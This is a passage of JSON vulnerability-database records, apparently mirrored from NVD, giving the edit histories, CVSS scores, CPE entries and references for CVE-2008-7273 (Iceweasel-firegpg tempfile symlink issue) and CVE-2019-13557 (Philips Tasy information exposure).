"c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2019-13557", "bulletinFamily": "NVD", "title": "CVE-2019-13557", "description": "In Tasy EMR, Tasy WebPortal Versions 3.02.1757 and prior, there is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.", "published": "2019-11-08T18:15:00", "modified": "2019-11-13T19:35:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "reporter": "ics-cert@hq.dhs.gov", "references": ["https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"], "cvelist": ["CVE-2019-13557"], "type": "cve", "lastseen": "2021-04-23T00:45:11", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "philips:tasy_webportal", "name": "philips tasy webportal", "operator": "le", "version": "3.02.1757"}, {"cpeName": "philips:tasy_emr", "name": "philips tasy emr", "operator": "le", "version": "3.02.1744"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:philips:tasy_emr:3.02.1744", "cpe:/a:philips:tasy_webportal:3.02.1757"], "cpe23": ["cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "versionEndIncluding": "3.02.1757", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*", "versionEndIncluding": "3.02.1744", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "cwe": ["CWE-200"], "description": "In Tasy EMR, Tasy WebPortal Versions 3.02.1757 and prior, there is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T07:12:50", "references": [{"idList": ["ICSMA-19-120-01"], "type": "ics"}, {"idList": ["SMNTC-110814"], "type": "symantec"}], "rev": 2}, "score": {"modified": "2021-02-02T07:12:50", "rev": 2, "value": 5.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"}], "hash": "e9304b5900c5df0bf0129391e302288570bf324c17d7c0a1db10a079025ded8a", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "66dda15d8673f8acf302e6abfdf034d4", "key": "cpe23"}, {"hash": "92d7b7dc5aefded413327c1cf5b692bd", "key": "description"}, {"hash": "d2d2311a75d334a58c48c6f0828d824b", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "3d1c4479f1355507da16d604579a9591", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "030e100bd87da58d86c9425ee8183685", "key": "published"}, {"hash": "002ab1d792c007a7cf57e1a80bff013c", "key": "modified"}, {"hash": "c91004c8959347662f0169e9eb71bd9b", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "92b6a5f115c1fa43fece7b1c4c9e2c47", "key": "cpe"}, {"hash": "ddfb7c1fc3f82e6caa17353ace986f88", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5062ea5024d79bc24dc105d924d2b405", "key": "cvelist"}, {"hash": "835f2efa961cf20b2bead9ce60fb6578", "key": "cvss3"}, {"hash": "8e0774a8b9ab0e5c52c18147d022a770", "key": "affectedSoftware"}, {"hash": "2b3cb3dc8cdb9c6653711c31934fc310", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "id": "CVE-2019-13557", "immutableFields": [], "lastseen": "2021-02-02T07:12:50", "modified": "2019-11-13T19:35:00", "objectVersion": "1.5", "published": "2019-11-08T18:15:00", "references": ["https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"], "reporter": "cve@mitre.org", "title": "CVE-2019-13557", "type": "cve", "viewCount": 28}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T07:12:50"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-13557"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "In Tasy EMR, Tasy WebPortal Versions 3.02.1757 and prior, there is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-11-09T18:12:16", "references": [{"idList": ["ICSMA-19-120-01"], "type": "ics"}, {"idList": ["SMNTC-110814"], "type": "symantec"}]}, "score": {"modified": "2019-11-09T18:12:16", "value": 5.4, "vector": "NONE"}}, "hash": "7208bca4a3df0dd2ba01d4336862bac12bff0ce46dd2c59a51036d03b3d50fe6", "hashmap": [{"hash": "c884f4fa55bd94ffe6da33807eb41c55", "key": "modified"}, {"hash": "92d7b7dc5aefded413327c1cf5b692bd", "key": "description"}, {"hash": "d2d2311a75d334a58c48c6f0828d824b", "key": "href"}, {"hash": "030e100bd87da58d86c9425ee8183685", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "c91004c8959347662f0169e9eb71bd9b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5062ea5024d79bc24dc105d924d2b405", "key": "cvelist"}, {"hash": "2b3cb3dc8cdb9c6653711c31934fc310", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "id": "CVE-2019-13557", "lastseen": "2019-11-09T18:12:16", "modified": "2019-11-08T18:51:00", "objectVersion": "1.3", "published": "2019-11-08T18:15:00", "references": ["https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"], "reporter": "cve@mitre.org", "title": "CVE-2019-13557", "type": "cve", "viewCount": 25}, "differentElements": ["cvss", "cvss2", "modified", "cwe", "affectedSoftware"], "edition": 1, "lastseen": "2019-11-09T18:12:16"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "philips:tasy_emr", "name": "philips tasy emr", "operator": "le", "version": "*"}, {"cpeName": "philips:tasy_webportal", "name": "philips tasy webportal", "operator": "le", "version": "*"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:philips:tasy_emr:3.02.1744", "cpe:/a:philips:tasy_webportal:3.02.1757"], "cpe23": ["cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "versionEndIncluding": "3.02.1757", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*", "versionEndIncluding": "3.02.1744", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "cwe": ["CWE-200"], "description": "In Tasy EMR, Tasy WebPortal Versions 3.02.1757 and prior, there is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-11-30T02:07:57", "references": [{"idList": ["ICSMA-19-120-01"], "type": "ics"}, {"idList": ["SMNTC-110814"], "type": "symantec"}], "rev": 2}, "score": {"modified": "2020-11-30T02:07:57", "rev": 2, "value": 5.4, "vector": "NONE"}}, "hash": "3b0df492985aee04c1955eee243975fc96d3f6eb48815dc43223fc7908f3ca6f", "hashmap": [{"hash": "66dda15d8673f8acf302e6abfdf034d4", "key": "cpe23"}, {"hash": "92d7b7dc5aefded413327c1cf5b692bd", "key": "description"}, {"hash": "d2d2311a75d334a58c48c6f0828d824b", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "3d1c4479f1355507da16d604579a9591", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "030e100bd87da58d86c9425ee8183685", "key": "published"}, {"hash": "002ab1d792c007a7cf57e1a80bff013c", "key": "modified"}, {"hash": "c91004c8959347662f0169e9eb71bd9b", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "92b6a5f115c1fa43fece7b1c4c9e2c47", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5062ea5024d79bc24dc105d924d2b405", "key": "cvelist"}, {"hash": "e31695227ee0fbec16d34155696f1f28", "key": "affectedSoftware"}, {"hash": "835f2efa961cf20b2bead9ce60fb6578", "key": "cvss3"}, {"hash": "2b3cb3dc8cdb9c6653711c31934fc310", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "id": "CVE-2019-13557", "lastseen": "2020-11-30T02:07:57", "modified": "2019-11-13T19:35:00", "objectVersion": "1.3", "published": "2019-11-08T18:15:00", "references": ["https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01"], "reporter": "cve@mitre.org", "title": "CVE-2019-13557", "type": "cve", "viewCount": 27}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-11-30T02:07:57"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "philips:tasy_webportal", "name": "philips tasy webportal", "operator": "le", "version": "3.02.1757"}, {"cpeName": "philips:tasy_emr", "name": "philips tasy emr", "operator": "le", "version": "3.02.1744"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:philips:tasy_emr:3.02.1744", "cpe:/a:philips:tasy_webportal:3.02.1757"], "cpe23": ["cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:philips:tasy_webportal:3.02.1757:*:*:*:*:*:*:*", "versionEndIncluding": "3.02.1757", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:philips:tasy_emr:3.02.1744:*:*:*:*:*:*:*", "versionEndIncluding": "3.02.1744", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-13557"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "cwe": ["CWE-200"], "description": "In 